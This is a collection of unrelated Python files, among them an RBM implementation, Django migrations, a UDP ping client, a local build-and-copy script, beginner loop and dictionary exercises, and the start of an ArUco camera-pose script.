        texts = ["Red", "Red", "Green", "Blue", "Blue", "Blue"]
        for text in texts:
            await conn.create(TEMPLATE, payload(party_info.party, text))
            # yield so the reader coroutine can observe each create
            await sleep(0.1)
        some_texts = await fut
        assert some_texts == texts[:3]
async def first_three(conn: Connection) -> Sequence[str]:
    """Return the ``text`` payload of the first three creates of TEMPLATE.

    Punches out of the stream early (before it is exhausted); exiting the
    ``async with`` block is expected to cleanly abort the stream.

    Note: the original annotation said ``Sequence[CreateEvent]``, but the
    function collects ``event.payload["text"]`` strings, so ``Sequence[str]``
    is the accurate type.

    :raises AssertionError: if the stream ends before three events arrive.
    """
    events = []
    async with conn.stream(TEMPLATE) as stream:
        async for event in stream.creates():
            events.append(event.payload["text"])
            if len(events) == 3:
                # punch out of the stream before we've consumed everything;
                # this should cleanly abort the stream
                return events
    raise AssertionError("did not receive three events")
|
import numpy as np
class gbrbm:
    """Gaussian-Bernoulli Restricted Boltzmann Machine (GB-RBM).

    Real-valued (Gaussian) visible units with a trainable per-unit
    log-variance, binary (Bernoulli) hidden units, and an optional 0/1
    adjacency mask restricting connectivity.  Written for Python 2
    (print statements, xrange, time.clock).
    """

    def __init__(self, visible = 0, hidden = 0,
            weights = 0.1, vbias = 0, stddev = 0.25, hbias = 0,
            adjacency_matrix = None, create_plots = False):
        """Initialise parameters.

        visible, hidden      -- unit counts (overridden by the shape of
                                adjacency_matrix when one is given)
        weights              -- scale for random init, or a full
                                (visible, hidden) matrix
        vbias, hbias, stddev -- scalars broadcast to row vectors, or
                                row vectors of matching size
        adjacency_matrix     -- optional (visible, hidden) mask
        create_plots         -- record energy/error/update history
        """
        # get dimensions (number of visible and hidden units)
        if hasattr(adjacency_matrix, 'shape'):
            visible = adjacency_matrix.shape[0]
            hidden = adjacency_matrix.shape[1]
        if not (visible > 0 and hidden > 0):
            print "gbrbm.__init__: number of visible and hidden units have to be > 0"
            quit()
        # initialize adjacency matrix
        # dimensions (visible, hidden)
        if hasattr(adjacency_matrix, 'shape') \
                and adjacency_matrix.shape == (visible, hidden):
            self.A = adjacency_matrix
        else:
            self.A = np.ones((visible, hidden))
        # initialize weight matrix
        # dimensions (visible, hidden)
        if hasattr(weights, 'shape') \
                and weights.shape == (visible, hidden):
            self.W = weights
        else:
            # scalar `weights` acts as a scale on N(0, 1) random values
            self.W = weights * np.random.randn(visible, hidden)
        # initialize bias of visible units
        # dimensions (1, visible)
        try:
            # scalar vbias is broadcast to a (1, visible) row vector
            vbias *= np.ones((1, visible))
            self.v_bias = vbias
        except:
            print "gbrbm.__init__: param 'vbias' has no valid dimension (1 x visible)"
            quit()
        # initialize bias of hidden units
        # dimensions (1, hidden)
        try:
            hbias *= np.ones((1, hidden))
            self.h_bias = hbias
        except:
            print "gbrbm.__init__: param 'hbias' has no valid dimension (1 x hidden)"
            quit()
        # initialize logarithmic variance of visible units
        # dimensions (1, visible)
        try:
            stddev *= np.ones((1, visible))
            # stored as log(sigma^2) so updates stay unconstrained
            self.v_lvar = np.log(stddev ** 2)
        except:
            print "gbrbm.__init__: param 'stddev' has no valid dimension (1 x visible)"
            quit()
        # initialize arrays for plots
        self.create_plots = create_plots
        self.plot = {}
        if create_plots:
            self.plot['x'] = np.empty(1)
            self.plot['Energy'] = np.empty(1)
            # keys prefixed with '_' hold the LaTeX label for the plot
            self.plot['_Energy'] = \
                "Energy = $- \sum \\frac{1}{2 \sigma_i^2}(v_i - b_i)^2 " +\
                "- \sum \\frac{1}{\sigma_i^2} w_{ij} v_i h_j " +\
                "- \sum c_j h_j$"
            self.plot['Error'] = np.empty(1)
            self.plot['_Error'] = \
                "Error = $\sum (data - p[v = data|\Theta])^2$"
            self.plot['Update'] = np.empty(1)
            self.plot['_Update'] = \
                "Update = $\\lambda \\cdot \\left|\\left|\\Delta W\\right|\\right|$"
        self.results = {}

    #
    # iterative training
    #
    def train(self, data, epochs = 10000,
            method = 'cdn', sampling_steps = 3, sampling_stat = 1,
            learning_rate = 0.025,
            learning_factor_weights = 1.0, learning_factor_vbias = 0.1,
            learning_factor_hbias = 0.1, learning_factor_vlvar = 0.01,
            plot_points = 200):
        """Train the RBM on `data` for `epochs` iterations.

        method         -- 'cd' (one-step CD), 'cdn' (CD-k with
                          `sampling_steps` steps averaged over
                          `sampling_stat` chains) or 'ml'
        learning_rate  -- base rate; the per-parameter rates are this
                          value scaled by the learning_factor_* args
        plot_points    -- number of history samples recorded when
                          create_plots is enabled

        Final parameters are copied into self.results.
        """
        # check if python module 'time' is available
        try:
            import time
        except:
            print "mp_gbrbm.train: could not import python module 'time'"
            quit()
        # initialize learning rates for weights, biases and logvar
        # using relative factors
        self.W_rate = learning_rate * learning_factor_weights
        self.v_bias_rate = learning_rate * learning_factor_vbias
        self.v_lvar_rate = learning_rate * learning_factor_vlvar
        self.h_bias_rate = learning_rate * learning_factor_hbias
        # initialize weights with respect to adjacence
        self.W *= self.A
        # initialize start time
        # NOTE(review): time.clock() is Python-2 era API (removed in 3.8)
        self.time_start = time.clock()
        if self.create_plots:
            # initialize epoch offset
            # (continue the x axis when train() is called repeatedly)
            if self.plot['x'].shape[0] == 1:
                epoch_offset = 0
            else:
                epoch_offset = \
                    self.plot['x'][self.plot['x'].shape[0] - 1]
            # initialize values for plots
            count = max(int(epochs / plot_points), 1)
            error = 0
            energy = 0
            update = 0
        estim_epoch = min(200, epochs)
        # define sampling function
        # (dispatch table selected once, before the main loop)
        sample = {
            'cd': lambda data:
                self.sample_cd(data),
            'cdn': lambda data:
                self.sample_cdn(data, sampling_steps, sampling_stat),
            'ml': lambda data:
                self.sample_ml(data)
        }[method]
        method_str = {
            'cd': 'CD',
            'cdn': 'CD-k (%d, %d)' % (sampling_steps, sampling_stat),
            'ml': 'ML'
        }[method]
        # main loop
        for epoch in xrange(1, epochs + 1):
            # use prefered sampling method
            v_data, h_data, v_model, h_model = sample(data)
            # estimate time
            # (extrapolate total runtime from the first estim_epoch epochs)
            if epoch == estim_epoch:
                delta = time.clock() - self.time_start
                estim_time = delta * epochs / float(epoch)
                print "...training %s epochs with %s, est. time: %.2fs" % \
                    (epochs, method_str, estim_time)
            # arrays for plots
            if self.create_plots:
                # calculate energy, error etc.
                error += self.error(v_data, v_model)
                energy += self.energy(v_model, h_model)
                update += self.norm_delta_W(v_data, h_data, v_model, h_model)
                # insert data for plots
                # (record the running averages every `count` epochs)
                if epoch % count == 0:
                    self.plot['x'] = \
                        np.append(self.plot['x'], epoch + epoch_offset)
                    self.plot['Error'] = \
                        np.append(self.plot['Error'], error / count)
                    self.plot['Energy'] = \
                        np.append(self.plot['Energy'], energy / count)
                    self.plot['Update'] = \
                        np.append(self.plot['Update'], update / count)
                    # reset energy and error
                    error = 0
                    energy = 0
                    update = 0
            # update params
            self.update_params(v_data, h_data, v_model, h_model)
        #copy results
        self.results['weights'] = self.W
        self.results['vbias'] = self.v_bias
        self.results['hbias'] = self.h_bias
        # convert the stored log-variance back to a standard deviation
        self.results['vsdev'] = np.sqrt(np.exp(self.v_lvar))

    #
    # sampling
    #
    #
    # contrastive divergency sampling (CD)
    #
    def sample_cd(self, data):
        """One-step contrastive divergence: one up-down-up pass."""
        v_data = data
        h_data = self.h_expect(v_data)
        v_model = self.v_expect(self.h_values(h_data))
        h_model = self.h_expect(v_model)
        return v_data, h_data, v_model, h_model

    #
    # k-step contrastive divergency sampling (CD-k)
    #
    def sample_cdn(self, data, n = 1, m = 1):
        """CD-k: run n Gibbs steps, averaged over m independent chains."""
        v_data = data
        h_data = self.h_expect(data)
        v_model = np.zeros(shape = v_data.shape)
        h_model = np.zeros(shape = h_data.shape)
        for i in range(m):
            for step in range(1, n + 1):
                # first step samples from the data-driven hidden units
                if step == 1:
                    h_values = self.h_values(h_data)
                else:
                    h_values = self.h_values(h_expect)
                v_expect = self.v_expect(h_values)
                # intermediate steps sample visible values; the last step
                # keeps expectations to reduce sampling noise
                if step < n:
                    v_values = self.v_values(v_expect)
                    h_expect = self.h_expect(v_values)
                else:
                    h_expect = self.h_expect(v_expect)
            v_model += v_expect
            h_model += h_expect
        v_model /= m
        h_model /= m
        return v_data, h_data, v_model, h_model

    #
    # persistent contrastive divergency sampling (persistentCD)
    # TODO: implement
    def sample_persistentCD(self, data, n = 1, m = 1):
        """Placeholder; not implemented (returns None)."""
        return

    #
    # maximum likelihood sampling (ML)
    # TODO: don't sample from visible units
    def sample_ml(self, data, n = 5, m = 10):
        """Like sample_cdn but with longer chains (defaults n=5, m=10)."""
        v_data = data
        h_data = self.h_expect(data)
        v_model = np.zeros(shape = v_data.shape)
        h_model = np.zeros(shape = h_data.shape)
        for i in range(m):
            for step in range(1, n + 1):
                if step == 1:
                    h_values = self.h_values(h_data)
                else:
                    h_values = self.h_values(h_expect)
                v_expect = self.v_expect(h_values)
                if step < n:
                    v_values = self.v_values(v_expect)
                    h_expect = self.h_expect(v_values)
                else:
                    h_expect = self.h_expect(v_expect)
            v_model += v_expect
            h_model += h_expect
        v_model /= m
        h_model /= m
        return v_data, h_data, v_model, h_model

    #
    # unit reconstruction
    #
    # expected values of visible units
    def v_expect(self, h_values):
        """Mean of the Gaussian visible units given hidden values."""
        return self.v_bias + np.dot(h_values, self.W.T)

    # gauss distributed random values of visible units
    def v_values(self, expect):
        """Sample visible units; NOTE(review): uses exp(v_lvar) — the
        variance — as the `scale` (std-dev) argument of np.random.normal;
        confirm this is intended."""
        return np.random.normal(expect, np.exp(self.v_lvar))

    # expected values of hidden units
    def h_expect(self, v_values):
        """Sigmoid activation probability of the hidden units."""
        return 1.0 / (1 + np.exp(-(self.h_bias +
            np.dot(v_values / np.exp(self.v_lvar), self.W))))

    # bernoulli distributed random values of hidden units
    def h_values(self, expect):
        """Bernoulli sample: boolean array, True with probability `expect`."""
        return expect > np.random.rand(expect.shape[0], expect.shape[1])

    #
    # update params
    #
    # calculate all deltas using same params and update
    def update_params(self, v_data, h_data, v_model, h_model):
        """Compute all gradients from the SAME parameter values, then apply.

        All four deltas are evaluated before any parameter is modified,
        so the updates do not see each other's changes within one epoch.
        """
        delta_W = self.delta_W(v_data, h_data, v_model, h_model)
        delta_v_bias = self.delta_v_bias(v_data, v_model)
        delta_h_bias = self.delta_h_bias(h_data, h_model)
        delta_v_lvar = self.delta_v_lvar(v_data, h_data, v_model, h_model)
        self.W += self.W_rate * delta_W
        self.v_bias += self.v_bias_rate * delta_v_bias
        self.h_bias += self.h_bias_rate * delta_h_bias
        self.v_lvar += self.v_lvar_rate * delta_v_lvar

    # update rule for weight matrix
    def delta_W(self, v_data, h_data, v_model, h_model):
        """(data - model) correlations, masked by adjacency, scaled by 1/sigma^2."""
        data = np.dot(v_data.T, h_data) / v_data.shape[0]
        model = np.dot(v_model.T, h_model) / v_model.shape[0]
        delta_W = (data - model) * self.A / np.exp(self.v_lvar).T
        return delta_W

    # update rule for visible units biases
    def delta_v_bias(self, v_data, v_model):
        """Mean (data - model) of visible units, scaled by 1/sigma^2."""
        data = np.mean(v_data, axis = 0).reshape(self.v_bias.shape)
        model = np.mean(v_model, axis = 0).reshape(self.v_bias.shape)
        delta_v_bias = (data - model) / np.exp(self.v_lvar)
        return delta_v_bias

    # update rule for hidden units biases
    def delta_h_bias(self, h_data, h_model):
        """Mean (data - model) of hidden units."""
        data = np.mean(h_data, axis = 0).reshape(self.h_bias.shape)
        model = np.mean(h_model, axis = 0).reshape(self.h_bias.shape)
        delta_h_bias = data - model
        return delta_h_bias

    # update rule for visible units logarithmic variance
    def delta_v_lvar(self, v_data, h_data, v_model, h_model):
        """Gradient of the log-variance parameters (data minus model term)."""
        data = np.mean(0.5 * (v_data - self.v_bias) ** 2 - v_data *
            np.dot(h_data, self.W.T), axis = 0).reshape(self.v_lvar.shape)
        model = np.mean(0.5 * (v_model - self.v_bias) ** 2 - v_model *
            np.dot(h_model, self.W.T), axis = 0).reshape(self.v_lvar.shape)
        delta_v_lvar = (data - model) / np.exp(self.v_lvar)
        return delta_v_lvar

    #
    # energy, error etc.
    #
    # calculate energy
    def energy(self, v_model, h_model):
        """GB-RBM energy of the model-side sample (summed over the batch)."""
        v_term = np.sum((v_model - self.v_bias) ** 2 / np.exp(self.v_lvar)) / 2
        h_term = np.sum(h_model * self.h_bias)
        W_term = np.sum(v_model * np.dot(h_model, self.W.T) / np.exp(self.v_lvar))
        energy = - (v_term + h_term + W_term)
        return energy

    # calculate error
    def error(self, v_data, v_model):
        """Summed squared reconstruction error."""
        error = np.sum((v_data - v_model) ** 2)
        return error

    # calculate update
    def norm_delta_W(self, v_data, h_data, v_model, h_model):
        """Magnitude of the effective weight update: rate * ||delta_W||."""
        delta_W = self.delta_W(v_data, h_data, v_model, h_model)
        norm = np.linalg.norm(delta_W)
        return self.W_rate * norm
## def run_visible(self, data):
## """
## Assuming the RBM has been trained (so that weights for the network have been learned),
## run the network on a set of visible units, to get a sample of the hidden units.
##
## Parameters
## ----------
## data: A matrix where each row consists of the states of the visible units.
##
## Returns
## -------
## hidden_states: A matrix where each row consists of the hidden units activated from the visible
## units in the data matrix passed in.
## """
##
## # get Number of training samples
## int_samples = data.shape[0]
##
## # Create a matrix, where each row is to be the hidden units (plus a bias unit)
## # sampled from a training example.
## hidden_states = np.ones((int_samples, self.hidden + 1))
##
## # Insert bias units of 1 into the first column of data.
## data = np.insert(data, 0, 1, axis = 1)
##
## # Calculate the activations of the hidden units.
## hidden_activations = np.dot(data, self.weights)
## # Calculate the probabilities of turning the hidden units on.
## hidden_probs = self._logistic(hidden_activations)
## # Turn the hidden units on with their specified probabilities.
## hidden_states[:,:] = hidden_probs > np.random.rand(int_samples, self.hidden + 1)
## # Always fix the bias unit to 1.
## # hidden_states[:,0] = 1
##
## # Ignore the bias units.
## hidden_states = hidden_states[:,1:]
## return hidden_states
##
## # TODO: Remove the code duplication between this method and `run_visible`?
## def run_hidden(self, data):
## """
## Assuming the RBM has been trained (so that weights for the network have been learned),
## run the network on a set of hidden units, to get a sample of the visible units.
##
## Parameters
## ----------
## data: A matrix where each row consists of the states of the hidden units.
##
## Returns
## -------
## visible_states: A matrix where each row consists of the visible units activated from the hidden
## units in the data matrix passed in.
## """
##
## # get Number of training samples
## int_samples = data.shape[0]
##
## # Create a matrix, where each row is to be the visible units (plus a bias unit)
## # sampled from a training example.
## visible_states = np.ones((int_samples, self.visible + 1))
##
## # Insert bias units of 1 into the first column of data.
## data = np.insert(data, 0, 1, axis = 1)
##
## # Calculate the activations of the visible units.
## visible_activations = np.dot(data, self.weights.T)
## # Calculate the probabilities of turning the visible units on.
## visible_probs = self._logistic(visible_activations)
## # Turn the visible units on with their specified probabilities.
## visible_states[:,:] = visible_probs > np.random.rand(int_samples, self.visible + 1)
## # Always fix the bias unit to 1.
## # visible_states[:,0] = 1
##
## # Ignore the bias units.
## visible_states = visible_states[:,1:]
## return visible_states
##
## def daydream(self, num_samples):
## """
## Randomly initialize the visible units once, and start running alternating Gibbs sampling steps
## (where each step consists of updating all the hidden units, and then updating all of the visible units),
## taking a sample of the visible units at each step.
## Note that we only initialize the network *once*, so these samples are correlated.
##
## Returns
## -------
## samples: A matrix, where each row is a sample of the visible units produced while the network was
## daydreaming.
## """
##
## # Create a matrix, where each row is to be a sample of of the visible units
## # (with an extra bias unit), initialized to all ones.
## samples = np.ones((num_samples, self.visible + 1))
##
## # Take the first sample from a uniform distribution.
## samples[0,1:] = np.random.rand(self.visible)
##
## # Start the alternating Gibbs sampling.
## # Note that we keep the hidden units binary states, but leave the
## # visible units as real probabilities. See section 3 of Hinton's
## # "A Practical Guide to Training Restricted Boltzmann Machines"
## # for more on why.
## for i in range(1, num_samples):
## visible = samples[i-1,:]
##
## # Calculate the activations of the hidden units.
## hidden_activations = np.dot(visible, self.weights)
## # Calculate the probabilities of turning the hidden units on.
## hidden_probs = self._logistic(hidden_activations)
## # Turn the hidden units on with their specified probabilities.
## hidden_states = hidden_probs > np.random.rand(self.hidden + 1)
## # Always fix the bias unit to 1.
## hidden_states[0] = 1
##
## # Recalculate the probabilities that the visible units are on.
## visible_activations = np.dot(hidden_states, self.weights.T)
## visible_probs = self._logistic(visible_activations)
## visible_states = visible_probs > np.random.rand(self.visible + 1)
## samples[i,:] = visible_states
##
## # Ignore the bias units (the first column), since they're always set to 1.
## return samples[:,1:]
#if __name__ == '__main__':
# sdev = 0.025 * np.ones((1, 4))
# gbrbm = gbrbm(1, 3, stddev = 0.5)
|
import tensorflow as tf
import numpy as np
import matplotlib
matplotlib.use('Agg')
from multiprocessing import Pool
from queue import Queue
from sklearn.model_selection import ParameterGrid
from sklearn import datasets
from sklearn.model_selection import train_test_split
from pandas import read_csv
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
import pandas as pd
class Fuzzification():
    """Map an (n, 1) time series onto integer interval indices."""

    def __init__(self, num_interval = None):
        # number of equal-width intervals the universe is split into
        self.num_interval = num_interval

    def fuzzify(self, timeseries):
        """Return, per sample, the rounded index of the interval it falls in.

        Assumes `timeseries` is a sequence of single-element rows
        (column-vector shape); the universe of discourse is [min, max].
        """
        series = np.array(timeseries)
        # universe of discourse: smallest and largest observed value
        u = [min(series)[0], max(series)[0]]
        print (u)
        # width of one interval (also kept on the instance for later use)
        self.interval = (u[1] - u[0]) / self.num_interval
        print (self.interval)
        return [round((row[0] - u[0]) / self.interval) for row in series]
|
# Generated by Django 2.2.17 on 2021-01-30 22:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter Domain.name: unique CharField with max_length=253."""

    dependencies = [
        ('admin', '0019_update_disabled_accounts_aliases'),
    ]

    operations = [
        migrations.AlterField(
            model_name='domain',
            name='name',
            field=models.CharField(help_text='The domain name', max_length=253, unique=True, verbose_name='name'),
        ),
    ]
|
# PYthon 3.7.3 use cse machine
from socket import *
import sys
import time
import statistics
def ping(host, port, count=15, reply_timeout=0.6):
    """Ping a UDP server and report round-trip-time statistics.

    Sends `count` datagrams of the form 'PING <seq> <timestamp>\\r\\n' to
    (host, port), waiting up to `reply_timeout` seconds for each reply.
    Prints one line per ping and a min/max/average RTT summary.

    Parameters
    ----------
    host : str
        server hostname or IP address
    port : int
        server UDP port
    count : int
        number of pings to send (default 15, matching the original loop)
    reply_timeout : float
        seconds to wait for each reply (default 0.6, i.e. 600 ms)
    """
    serverName = host
    serverPort = port
    # Create UDP client socket
    clientSocket = socket(AF_INET, SOCK_DGRAM)
    # set the receive timeout once instead of on every loop iteration
    clientSocket.settimeout(reply_timeout)
    seqnum = 3331
    rtts = []  # RTTs (ms) of the pings that were answered
    for _ in range(count):
        starttime = time.time() * 1000
        message = 'PING' + ' ' + str(seqnum) + ' ' + str(starttime) + '\r\n'
        clientSocket.sendto(message.encode('utf-8'), (serverName, serverPort))
        try:
            modifiedMessage, serverAddress = clientSocket.recvfrom(2048)
            usetime = time.time() * 1000 - starttime
            rtts.append(usetime)
            print(f'Ping to {serverName}, seq = {seqnum}, rtt = {int(usetime)} ms')
        except timeout:
            print(f'Ping to {serverName}, seq = {seqnum}, timeout')
        # the sequence number advances whether or not a reply arrived
        seqnum += 1
    print('transmission finished')
    if len(rtts) > 0:
        minrtt = min(rtts)
        maxrtt = max(rtts)
        avertt = statistics.mean(rtts)
        print(f'MINIMUM RTT is {int(minrtt)} ms, MAXIMUM RTT is {int(maxrtt)} ms, AVERAGE RTT is {int(avertt)} ms\n')
    else:
        print('ALL TIME OUT,Check Host port again\n')
    # Close the socket
    clientSocket.close()
if __name__ == '__main__':
    # usage: python <script> <host> <port>
    if len(sys.argv) < 3:
        # fixed typo: message previously read "required host prot"
        print('required host port')
        exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    ping(host, port)
|
import sys
import os
sys.path.append(os.path.dirname(__file__))
import func_sign_prob_plugin
#print(f'sys-path >{sys.path}<')
def create_cutter_plugin():
    """Entry point called by Cutter to instantiate this plugin."""
    plugin = func_sign_prob_plugin.FuncSignProbCutterPlugin()
    return plugin
|
#!/usr/bin/python3
# Task 7. Error code #1
if __name__ == "__main__":
    import sys
    import requests

    # Fetch the URL given on the command line; print its body, or the
    # status code when the response is an HTTP error (>= 400).
    if len(sys.argv) < 2:
        # previously an unguarded sys.argv[1] raised IndexError
        print("Usage: {} <url>".format(sys.argv[0]))
        sys.exit(1)
    the_url = sys.argv[1]
    my_req = requests.get(the_url)
    the_resp = my_req.status_code
    if the_resp >= 400:
        print("Error code: {}".format(the_resp))
    else:
        print(my_req.text)
|
import os
from time import sleep
from shutil import copyfile
import db
def rename_file(file):
    """Strip the interpreter tag from a compiled file in __pycache__/.

    'name.cpython-37.pyc' becomes 'name.pyc' (drops the middle part of a
    three-part filename).  Any 'Auto_update' occurrence in the resulting
    path is rewritten to 'Auto_update2'.
    """
    cache_dir = os.path.join(os.getcwd(), '__pycache__/')
    parts = file.split('.')
    src = os.path.join(cache_dir, file)
    dst = os.path.join(cache_dir, parts[0] + '.' + parts[2])
    if 'Auto_update' in dst:
        dst = dst.replace('Auto_update', 'Auto_update2')
    os.rename(src, dst)
def get_modules():
    """Return the absolute path of every entry in ./__pycache__/."""
    cache_dir = os.path.join(os.getcwd(), '__pycache__')
    return [os.path.join(cache_dir, name) for name in os.listdir('__pycache__/')]
def get_Mission_files():
    """Return absolute paths of files in cwd whose name contains 'Mission'.

    Prints the matched names and the resulting paths (kept from the
    original for operator feedback).
    """
    names = [entry for entry in os.listdir('./') if 'Mission' in entry]
    print(names)
    here = os.getcwd()
    Mission_path = [os.path.join(here, entry) for entry in names]
    print(Mission_path)
    return Mission_path
def get_folder_files(folder_name):
    """Return the absolute path of every entry directly inside `folder_name`."""
    base = os.path.join(os.getcwd(), folder_name)
    return [os.path.join(base, name) for name in os.listdir(folder_name)]
def clean_info():
    """Reset the three runtime .ini files to an empty-dict payload ('{}')."""
    content = r'{}'
    # write order kept from the original: alliance, offer, offer config
    for ini_path in (r'.\ini\Alliance_num.ini',
                     r'.\ini\Offer.ini',
                     r'.\ini\Offer_config.ini'):
        with open(ini_path, 'w') as fh:
            fh.write(content)
def main():
    """Rebuild the project's .pyc release and stage it under C:/Coding/src.

    Pipeline (order matters — each step works on the previous step's
    output): reset ini files, bump the DB version, recompile everything
    into __pycache__, strip interpreter tags from the .pyc names, wipe
    the release folders, copy fresh artefacts in, then hand off to
    StartGit.bat.
    """
    clean_info()
    db.update_version()
    # get all file abs path in dir'__pycache__'/
    modules_path = get_modules()
    print(modules_path)
    # delete them all
    [os.remove(file) for file in modules_path]
    sleep(2)
    # compile the src dir
    os.system('python -m compileall')
    sleep(2)
    # get all compiled file abs path in dir'__pycache__'/
    modules_path = get_modules()
    # remove mission files
    [os.remove(file) for file in modules_path if 'Mission' in file]
    sleep(1)
    # get all file names in dir '__pycache__'/
    modules = os.listdir('__pycache__/')
    # rename all these files so that they can run everywhere
    [rename_file(module) for module in modules]
    sleep(2)
    # move file in cash into Coding\
    src = r'C:\Coding\src'
    driver = r'C:\Coding\src\driver'
    ini = r'C:\Coding\src\ini'
    lp = r'C:\Coding\src\lp'
    ui = r'C:\Coding\src\ui'
    # wipe each destination folder before copying (files containing '.'
    # only in src, and never anything with '.git' in the path)
    modules_path_src = get_folder_files(src)
    [os.remove(file) for file in modules_path_src if '.' in file and '.git' not in file]
    modules_path_driver = get_folder_files(driver)
    [os.remove(file) for file in modules_path_driver]
    modules_path_ini = get_folder_files(ini)
    [os.remove(file) for file in modules_path_ini]
    modules_path_lp = get_folder_files(lp)
    [os.remove(file) for file in modules_path_lp ]
    modules_path_ui = get_folder_files(ui)
    [os.remove(file) for file in modules_path_ui]
    # __pycache__
    modules_path = get_modules()
    for file in modules_path:
        dirname,filename = os.path.split(file)
        src_file = os.path.join(src,filename)
        copyfile(file,src_file)
    # src
    Mission_path = get_Mission_files()
    for file in Mission_path:
        dirname,filename = os.path.split(file)
        src_file = os.path.join(src,filename)
        copyfile(file,src_file)
    # driver
    Mission_path = get_folder_files('driver')
    for file in Mission_path:
        dirname,filename = os.path.split(file)
        src_file = os.path.join(driver,filename)
        copyfile(file,src_file)
    # ini
    Mission_path = get_folder_files('ini')
    for file in Mission_path:
        dirname,filename = os.path.split(file)
        src_file = os.path.join(ini,filename)
        copyfile(file,src_file)
    # lp
    Mission_path = get_folder_files('lp')
    for file in Mission_path:
        dirname,filename = os.path.split(file)
        src_file = os.path.join(lp,filename)
        copyfile(file,src_file)
    # ui
    Mission_path = get_folder_files('ui')
    for file in Mission_path:
        dirname,filename = os.path.split(file)
        src_file = os.path.join(ui,filename)
        copyfile(file,src_file)
    # [copyfile(file,src) for file in modules_path]
    print('Compile finished.........')
    # modules = [module.strip('.py') for module in modules]
    command = '..\StartGit.bat'
    os.system(command)
    # db.update_version()
# db.update_version()
# run the whole build/deploy pipeline when executed as a script
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# break 跳出最近所在的循环
# continue 跳到最近所在循环的开头处(来到循环的首行)
# pass 占位语句,什么事也不做
# 循环else模块 只有当循环正常离开时才会执行(没有触发break)
# Example: break — sum 1..100, leaving the loop from inside its body.
res = i = 0
while True:
    i = i + 1
    res = res + i
    if i >= 100:
        break
print(res)
# Example: continue — sum of the odd numbers in 1..100,
# skipping even values via continue.
res = i = 0
while i < 100:
    i = i + 1
    if i & 1 == 0:
        continue
    res = res + i
print(res)
# Example: loop else — runs only when the loop exits normally (no break).
res = i = 0
while i < 100:
    i = i + 1
    res = res + i
else:
    print(res)
# Example: primality test via trial division; the while/else fires only
# when no divisor was found (the loop ended without break).
for y in range(2, 100):
    x = y // 2
    while x > 1:
        if y % x:
            x -= 1
        else:
            break
    else:
        print(y, '是一个质数')
|
from rest_framework import serializers
from api.models import History
class HistorySerializer(serializers.ModelSerializer):
    """Serialize History records (user, request metadata, timestamps)."""
    class Meta:
        model = History
        fields = ('id', 'user', 'ip_address', 'browser_info', 'location', 'created_at', 'updated_at')
|
#Core data types:
'''
List:
mutable
declare: a=[1,2,3]
access: a[1],a[1:4]
modify: a[1]=100
a.append(8),a.extend([45,65]),a.insert(1,45)
delete: del a[2],del a[2:5]
a.pop(),a.pop(2),del a
a.clear()
Tuple:
immutable- cannot be changed
declare: a=(1,2,3,4)
access: a[1]
modify: not possible
deletion not possible
del a - entire deletion is possible
set:
mutable
Unordered lists without duplicates
a={1,2,3,4}
index accessing is not possible
adding ele: a.add(ele)
a.update({2,3,99})
delete: del a - entire set is deleted
dictionary:
key&value pair
a={1:23,2:34,3:45}
access: a[key]
modify: a[key]=new value,a[key]=update value, a.update({key:value,key:value})
deletion: del a, del a[key]
'''
#Adding elements into dict:
#METHOD-1:
'''
a={}
for i in range(2): #keys
k=input("enter a key:") #s1
v=[]
for j in range(2): #values
m=int(input("enter marks: "))
v.append(m) #[34,54]
a[k]=v #a['s1']=[34,54],a['s2']=[65,54]
print(a)
'''
#METHOD-2:
'''
a={}
n=int(input("enter key count:"))
for i in range(1,n+1): #keys
k=input("enter a key:")
v=[]
p=int(input("enter a value count:"))
for j in range(p): #values
m=int(input("enter marks: "))
v.append(m)
a[k]=v
print(a)
'''
#METHOD-3: read one whitespace-separated line of ints as each key's value
a={}
n=int(input("enter key count:"))
for i in range(1,n+1):
    k=input("enter a key:")
    # split the line and convert every field to int in a single expression
    a[k]=list(map(int,input().split()))
print(a)
|
# Generated by Django 2.1.9 on 2019-08-12 07:48
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the optional free-text field WhiskyInfo.general_desc."""

    dependencies = [
        ('whiskydatabase', '0018_auto_20190805_1341'),
    ]

    operations = [
        migrations.AddField(
            model_name='whiskyinfo',
            name='general_desc',
            # blank=True, null=True: the description may be omitted entirely
            field=models.TextField(blank=True, null=True),
        ),
    ]
|
# Repeatedly read an integer, report whether it is odd, and count its digits.
# NOTE(review): the loop has no exit condition — it runs until the user
# interrupts it or input() fails; presumably intentional for a drill.
while True:
    result = []
    N = int(input('Enter integral number: '))
    # 'Yes' means the number is odd
    if N % 2 == 1:
        print('Yes')
    else:
        print('No')
    # collect the characters of the decimal representation to count them
    # NOTE(review): a leading '-' on a negative number is counted as a digit
    for element in str(N):
        result.append(element)
    no_of_digits = len(result)
    print(f'There are {no_of_digits} digit(s) in the integral number {N}')
|
# Generated by Django 2.2 on 2020-10-04 14:10
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter SocInstaProxy.location: CharField with default 'Amsterdam'."""

    dependencies = [
        ('instagram', '0010_auto_20201004_1709'),
    ]

    operations = [
        migrations.AlterField(
            model_name='socinstaproxy',
            name='location',
            field=models.CharField(default='Amsterdam', max_length=200, verbose_name='Location'),
        ),
    ]
|
# The following code is used to watch a video stream, detect Aruco markers, and use
# a set of markers to determine the posture of the camera in relation to the plane
# of markers.
#
# Assumes that all markers are on the same plane, for example on the same piece of paper
#
# Requires camera calibration (see the rest of the project for example calibration)
import numpy as np
import cv2
import cv2.aruco as aruco
import os
import pickle
from numpy.linalg import inv
# Constant parameters used in Aruco methods
ARUCO_PARAMETERS = aruco.DetectorParameters_create()
# 4x4-bit marker dictionary with 50 distinct ids
ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_4X4_50)
# Create grid board object we're using in our stream
# (10x6 squares; square/marker side lengths presumably in metres — confirm)
CHARUCO_BOARD = aruco.CharucoBoard_create(squaresX=10,
        squaresY=6,
        squareLength=0.04,
        markerLength=0.03,
        dictionary=ARUCO_DICT)
def readCameraCalibration():
    """Load the pickled camera intrinsics.

    Returns (cameraMatrix, distCoeffs) read from the calibration pickle;
    exits the process if the pickle holds no calibration data.
    """
    # Check for camera calibration data.  `with` guarantees the file is
    # closed even if unpickling raises (the original leaked the handle).
    with open('data/calibration/Logitech/C1.pckl', 'rb') as f:
        (cameraMatrix, distCoeffs, _, _) = pickle.load(f)
